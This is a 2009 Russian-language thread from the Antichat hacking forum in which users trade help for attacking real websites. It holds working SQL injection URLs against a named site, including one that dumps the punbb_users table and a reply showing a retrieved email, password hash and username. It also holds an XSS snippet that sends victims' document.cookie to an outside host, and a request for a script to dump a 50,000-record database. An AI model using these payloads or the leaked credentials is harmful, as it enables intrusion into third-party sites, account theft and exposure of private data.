Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
12.02.2009, 20:45
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Помагите , зделот хут кокойто запрос ...
|
|
|
12.02.2009, 20:50
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
http://www.panelmonkey.org/background.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--
|
|
|
|
12.02.2009, 20:50
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от o3,14um
так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
Или так оно не примет и о xss можно забыть?
А у тебя есть возможность изменить action? Или ты пытаешь автоформу зделать? Ну xss возможна если ты можешь встроить в страницу свой html(js) код посредством изменения каких то параметров передоваемых скрипту(грубо говоря и не вдаваясь в подробности), и если ты отправляешь форму(обычную) post на http://hacsite.ru/12.php то следуя из ошибко видно что у тебя отрпавляеться Content-type: text/xml(ну или xslt) в ответе от http://hacsite.ru/12.php но возрашаемое тело документа далеко не xml.
|
|
|
|
12.02.2009, 20:57
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
странно!
-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.
И на все тругие тоше самое ..
|
|
|
|
12.02.2009, 20:59
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Saiga
странно!
-m0rgan-
почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.
И на все тругие тоше самое ..
Убери пробелы из урла и почитай любую статью по скулям
|
|
|
|
12.02.2009, 21:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 Saiga
http://www.panelmonkey.org/background.php?id=-1/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id, password,username),0x71),0x71),3,4,5,6,7/**/FROM/**/punbb_users/**/LIMIT/**/1,1--
piney@panelmonkey.org:2:8d078be183b8a05eb74256465e 9a507ad5c825f3:TPS Pineapple
работай лимитом и всё у тебя получится
Последний раз редактировалось Gorev; 12.02.2009 в 21:03..
|
|
|
|
12.02.2009, 21:14
|
|
Новичок
Регистрация: 10.02.2009
Сообщений: 7
Провел на форуме:
26091
Репутация:
3
|
|
Сообщение от mozarat
У меня такая проблема...
Вобщем есть xss, все делаю правильно... Но мне приходят куки того хостинга на котором лежит мой сниффер. Если на народе страница с редиректом на сниффер, то приходят куки народа... Xss пасивная. Кто знает что может быть?
А если свой сниффер размещю на своем хостинге, то куки приходят тоже моего хостинга =\
Код присутствующий на странице такой:
PHP код:
<script>img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;</script>
Это в .html
Или еще в .js
PHP код:
img = new Image(); img.src = "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;
Xss активная прописывается в сообщении. Сайт выполняет код с заданой ссылки(сайта).
Ставил снииффер на lcoalhoste и сайт (двиг самописаный), и куки приходят нормальные.
|
|
|
|
12.02.2009, 21:48
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Это,люди,вот такой код:
require "./start.php";
require $site_dir."/include/security.php";
if ($HTTP_POST_VARS["editor_mode"] || $HTTP_GET_VARS["editor_mode"] || $HTTP_COOKIE_VARS["editor_mode"] == "editor") {
func_header_location("error_message.php?access_den ied&id=3");
}
if (isset($editor_mode))
unset($editor_mode);
x_session_register("editor_mode");
Возможна ли здесь ансет атака,даже если она ничего не даёт :Д
|
|
|
|
12.02.2009, 22:57
|
|
Новичок
Регистрация: 25.10.2006
Сообщений: 10
Провел на форуме:
120981
Репутация:
1
|
|
Народ поскажите какой небудь скриптик что бы слить базу под 50K записей.
Проблема в том что чтобы добраться до sql inj надо авторизация на сайте. Без этого к данной sql inj доступа нет. Единственный вариант сливать руками через IE и LIMIT, что никак не хочется  Извините если попал в offtop |
|
|
|
13.02.2009, 06:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
всю базу со всеми колонками? Через скулю? Можно в теории, но слишком долго будет и серв может загнуться, кроме того в логах сервера столько будет гавна)))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
